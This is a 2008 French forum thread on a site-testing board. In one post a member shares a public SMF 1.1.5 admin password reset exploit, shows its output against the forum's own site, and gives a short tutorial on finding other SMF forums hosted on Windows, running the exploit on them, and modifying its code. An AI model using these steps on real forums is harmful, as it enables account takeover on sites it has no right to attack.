TESTER MON SITE http://nopinjection.com

Nos experts testeront vos sites avec attention.
Postez ici vos liens. Et fournissez les accès de bases (login et mot de passe 'simple utilisateur' par exemple si vous souhaitez voir ce qu'un utilisateur peux exploiter)

Moderators: Mod, Mod, Mod

Postby JTC » Fri Aug 29, 2008 11:12 am

prochain message :arrow:
Last edited by JTC on Fri Aug 29, 2008 11:21 am, edited 1 time in total.
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby JTC » Fri Aug 29, 2008 11:18 am

[b:524a85a481]Hup,[/b:524a85a481]

je connaissais déjà cette vulnz
elle marche que sur les versions antérieurs à la 1.1.3 :)

[b:524a85a481]Ps: [color=red:524a85a481]xxxx[/color:524a85a481] dit avoir trouvé une faille niveau server en localhost ( mais je n'y crois pas car il n'a donné aucunes preuves de son "dit"[/b:524a85a481])

et il voulait que je lui fasse de la pub pour sa pub google ( de son site) en échange .
Moi si je n'ai pas la preuve de ce qui l'avance, je n'y crois pas !

Korigan : Penses tu que "[color=red:524a85a481]xxxx[/color:524a85a481]" est un membre de confiance ?

Merci

[b:524a85a481]Bien Cordialement[/b:524a85a481] :!:
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby ANTPIRG » Sun Aug 31, 2008 9:46 am

J'ai vue que tu utilisais un cookies pour identifier les membres donc pour q'il se connecte imagine q'il trouve un lien admin en calculant l'adresse d'un cookies et bah il pourra peut être t'avoir mais le risque je le met de 3/10 .
ANTPIRG
Projets
 
Posts: 132
Joined: Sat Aug 30, 2008 10:22 am

Postby JTC » Sun Aug 31, 2008 7:33 pm

merci, on le sait tres bien :) et on fais très attention donc risque : 1/10 pour ma part

sinon utiliser wamp sous windows c'est risquer ?

Bien Cordialement

et n'hesiter pas à nous faire preuve de vos nouvelle trouvaille =)
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby Korigan » Mon Sep 01, 2008 9:05 am

[quote:dba4a3dd8c="JTC"][b:dba4a3dd8c]Hup,[/b:dba4a3dd8c]

je connaissais déjà cette vulnz
elle marche que sur les versions antérieurs à la 1.1.3 :)

[b:dba4a3dd8c]Ps: [color=red:dba4a3dd8c]xxxx[edit] Pas de dénonciation ici[/edit][/color:dba4a3dd8c]dit avoir trouvé une faille niveau server en localhost ( mais je n'y crois pas car il n'a donné aucunes preuves de son "dit"[/b:dba4a3dd8c])

et il voulait que je lui fasse de la pub pour sa pub google ( de son site) en échange .
Moi si je n'ai pas la preuve de ce qui l'avance, je n'y crois pas !

Korigan : Penses tu que "[color=red:dba4a3dd8c]xxxx[/color:dba4a3dd8c]" est un membre de confiance ?

Merci

[b:dba4a3dd8c]Bien Cordialement[/b:dba4a3dd8c] :!:[/quote:dba4a3dd8c]
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby JTC » Thu Sep 04, 2008 5:13 pm

ok, mais personne ne répond à ma question?
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby JTC » Mon Sep 08, 2008 9:55 am

slt à tous ;

hier une faille smf 1.1.5 seulement pour ceux qui heberges sous windows a ete decouverte :

http://milw0rm.com/exploits/6392

exemple d'utilisation

18:41:07 fuck ~ $ php nop.php nopinjection.com /nopinjection/ --userid=444 --username=Stargatemaster
---------------------------------------------------------------
SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)
(c)oded by Raz0r (http://Raz0r.name/)
---------------------------------------------------------------
[~] Connecting to nopinjection.com ... OK

* Seed for next random number is 3289
* Success! To set password visit this link:

http://nopinjection.com/nopinjection/index.php?action=reminder;sa=setpassword;u=444;code=c1fcf5e107

# milw0rm.com [2008-09-06]






bien entendu la faille a ete corrigé :)

[b:e76b97398e]petit tuto :[/b:e76b97398e]



[color=yellow:e76b97398e]si tu es windows, regarde ce tutoriel:[/color:e76b97398e] http://www.siteduzero.com/tutoriel-3-33412-executer-php-en-cli-console.html


Trouve un forum smf 1.1.5 hébergé sous windows ( ce qui est plutôt rare) puis tu lance l'exploit:

[b:e76b97398e][color=yellow:e76b97398e]USAGE:
~~~~~~[/color:e76b97398e][/b:e76b97398e]
[code:1:e76b97398e]php smf.php [host] [path] OPTIONS

[host] - target server where SMF is installed
[path] - path to SMF

OPTIONS:
--userid=[value] (default: 1)
--username=[value] (default: admin)
examples:
php smf.php site.com /forum/
php smf.php site.com / --userid=2 --username=odmen[/code:1:e76b97398e]



[color=red:e76b97398e]si ca te met :[/color:e76b97398e]

[code:1:e76b97398e][~] Connecting to site.com ... OK
PHP Notice: Undefined variable: md5 in C:\repertoire\exploit.php on line 91
[-] Random number hash not found[/code:1:e76b97398e]

c'est que le site n'est pas hebergé sous Windows mais sur par exemple sous une distrib linux

voici une commande à mettre dans le script pour des infos sur les raisons de l'échec

donc tu vas mettre:

[code:1:e76b97398e] } else print $resp;
}[/code:1:e76b97398e]

après [color=red:e76b97398e]break;[/color:e76b97398e]

[color=yellow:e76b97398e]ce qui donne :[/color:e76b97398e]

[code:1:e76b97398e]while(!feof($ock)) {
$resp = fgets($ock);
preg_match('@name="sc" value="([0-9a-f]+)"@i',$resp,$out);
if(isset($out[1])) {
$md5 = $out[1];
break;
} else print $resp;
}[/code:1:e76b97398e]

[color=yellow:e76b97398e]tu aura comme réponse ca:[/color:e76b97398e]

[b:e76b97398e]HTTP/1.1 302 Found
Date: Mon 08 Sep 2008 07:30:53 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/4.4.9
Expires: Thu 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Location: http://www.site.com/forum/index.php?www;action=reminder
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5 max=100
Connection: Keep-Alive
Content-Type: text/html[/b:e76b97398e]
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Postby STARGATEMASTER » Wed Sep 24, 2008 10:54 am

Alors toujours rien :?:
STARGATEMASTER
Projets
 
Posts: 2
Joined: Thu Aug 28, 2008 3:12 pm

Postby Korigan » Thu Sep 25, 2008 3:06 pm

+1 JTC

Merci pour ta recherche, et la démonstration!

La sécurité n'est pas un projet, c'est un processus...
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby JTC » Tue Sep 30, 2008 12:54 pm

http://nopinjection.com/nopinjection/index.php?topic=1987.0

voici toutes les securités :)
User avatar
JTC
Projets
 
Posts: 15
Joined: Wed Aug 27, 2008 6:26 pm

Previous

Return to Faites tester vos sites <b>DE TEST</b>

Who is online

Users browsing this forum: No registered users and 1 guest

cron